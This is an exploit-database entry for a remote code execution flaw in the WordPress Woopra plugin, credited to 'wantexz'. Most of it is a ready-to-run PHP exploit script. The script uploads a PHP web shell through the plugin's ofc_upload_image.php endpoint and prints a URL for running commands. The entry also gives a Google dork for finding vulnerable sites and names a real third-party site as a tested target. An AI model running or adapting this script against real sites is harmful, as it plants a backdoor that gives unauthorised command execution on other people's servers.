WordPress Woopra Remote Code Execution

2013.10.08
Credit: wantexz
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/plugins/woopra/inc/php-ofc-library OR inurl:wp-content/plugins/woopra/inc/

# Exploit Title: woopra plugins execute arbitrary PHP code Exploit # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/ # Date: [06-10-2013] # Exploit Author: wantexz # Vendor Homepage:wordpress.org/plugins/woopra/ # Software Link: wordpress.org/plugins/woopra # Version: woopra # Tested on: [wantexz] # CVE : # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php ############################################################################################ # INDONESIANCODER # by # WANTEXZ # ############################################################################################ <?php # woopra plugins ~ Exploit # http://indonesiancoder.com/ # echo <<<EOT # ----------------------------------- #/ woopra ~ Exploit \ #\ Author: wantexz / # ----------------------------------- ################################################################################################ # Author: WANTEXZ # # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys # all indonesian coder, indonesian defacer, kill-9 ,jatimcom , malangcyber # ################################################################################################ EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n -u http://target.com/ The full path to Joomla! -f shell.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}"; $url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>

References:

http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top